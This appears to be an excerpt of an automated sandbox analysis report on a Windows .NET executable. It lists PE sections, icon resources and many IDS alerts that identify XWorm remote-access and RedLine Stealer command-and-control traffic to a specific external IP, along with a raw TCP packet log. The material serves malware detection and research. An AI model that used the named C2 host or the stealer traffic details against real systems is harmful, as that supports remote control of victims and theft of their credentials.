                                                                                                                                                                                                                                                      .rsrc0x160000xe10a0xe200ed8160b04e401ae5cc259aa8a121c3c8False0.6701465707964602data6.381337639378496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x260000xc0x200c81d8e242d829f073d7136c94ddd3d40False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_ICON0x163700x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.4966216216216216
                                                                                                                                                                                                                                                      RT_ICON0x164980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.2218208092485549
                                                                                                                                                                                                                                                      RT_ICON0x16a000x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.47950819672131145
                                                                                                                                                                                                                                                      RT_ICON0x16be80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.5576036866359447
                                                                                                                                                                                                                                                      RT_ICON0x172b00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.43010752688172044
                                                                                                                                                                                                                                                      RT_ICON0x175980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6195848375451264
                                                                                                                                                                                                                                                      RT_ICON0x17e400x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.3225609756097561
                                                                                                                                                                                                                                                      RT_ICON0x184a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5434434968017058
                                                                                                                                                                                                                                                      RT_ICON0x193500x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.2730496453900709
                                                                                                                                                                                                                                                      RT_ICON0x197b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5311475409836065
                                                                                                                                                                                                                                                      RT_ICON0x1a1400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.4678705440900563
                                                                                                                                                                                                                                                      RT_ICON0x1b1e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3720954356846473
                                                                                                                                                                                                                                                      RT_ICON0x1d7900x6328PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9843208320201702
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x23ab80xbcdata0.5585106382978723
                                                                                                                                                                                                                                                      RT_VERSION0x23b740x3acdata0.4276595744680851
                                                                                                                                                                                                                                                      RT_MANIFEST0x23f200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-12-08T15:08:13.744131+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.749830149.154.167.220443TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:19.169034+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:27.204761+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:27.758355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:27.765691+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:28.345620+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:29.172585+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:33.201795+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:33.201795+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:34.169771+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:39.168554+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:40.652199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:40.656781+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:44.169826+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:49.179394+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:51.231113+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:53.738977+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:53.829799+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:54.168331+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:08:59.264515+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:03.202268+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:03.202268+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:04.175376+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:06.777262+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:06.778789+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:09.183205+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:14.202103+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:19.225320+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:19.960688+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:19.962388+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:23.261690+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74997578.70.235.2381912TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:23.261690+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.74997578.70.235.2381912TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:23.671143+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response178.70.235.2381912192.168.2.749975TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:24.234614+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:28.741564+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74997578.70.235.2381912TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:29.243495+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:29.351833+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)178.70.235.2381912192.168.2.749975TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:32.363456+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74997578.70.235.2381912TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:32.830923+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.74997578.70.235.2381912TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:32.872415+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:32.918546+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:33.200149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:33.204532+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:33.392117+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:33.392117+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:34.254947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:39.269114+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:44.263695+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:44.482617+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:44.513231+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.659084+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.659084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.781337+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.781337+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.931838+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:48.931838+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.051515+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.051515+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.175077+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.175077+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.275442+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.297083+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.297083+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.422887+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.422887+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.556373+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.556373+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.687489+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.687489+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.812838+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.812838+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.954401+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:49.954401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:50.125521+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:50.125521+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:50.250044+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:50.250044+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997678.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:51.356356+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:51.361211+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:54.284307+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:57.512458+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:57.519867+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:09:59.338792+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:01.453437+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:01.455407+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:02.982048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:02.983572+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:03.231685+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:03.231685+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:04.304027+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:09.292820+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:10.824207+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:10.831218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:11.598830+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:11.605188+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:14.407336+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:19.299922+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:29.291834+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:33.250882+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:33.250882+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:34.289266+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:37.156355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:37.183249+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:39.306302+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:44.334483+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:49.638357+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:50.343627+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:50.357024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:54.322857+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:56.246610+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:56.254885+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:10:59.342002+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:01.450287+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:01.459302+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:03.249490+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:03.249490+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:04.351419+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.147793+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.239367+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.340025+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.358720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.531901+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:07.542279+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74983778.70.235.2387000TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:09.342076+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:14.358124+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:19.374627+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:24.414182+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:29.394596+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:33.247910+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:33.247910+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:34.399150+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:39.416026+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:44.439871+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP
                                                                                                                                                                                                                                                      2024-12-08T15:11:49.925111+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes178.70.235.2387000192.168.2.749837TCP

                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.794413090 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.914558887 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.914753914 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.919528961 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:17.039019108 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:18.072190046 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:18.123960972 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:10.547015905 CET8049702208.95.112.1192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:10.547072887 CET4970280192.168.2.7208.95.112.1
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.735758066 CET49830443192.168.2.7149.154.167.220
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.735793114 CET44349830149.154.167.220192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.735902071 CET49830443192.168.2.7149.154.167.220
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.750361919 CET49830443192.168.2.7149.154.167.220
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.750381947 CET44349830149.154.167.220192.168.2.7
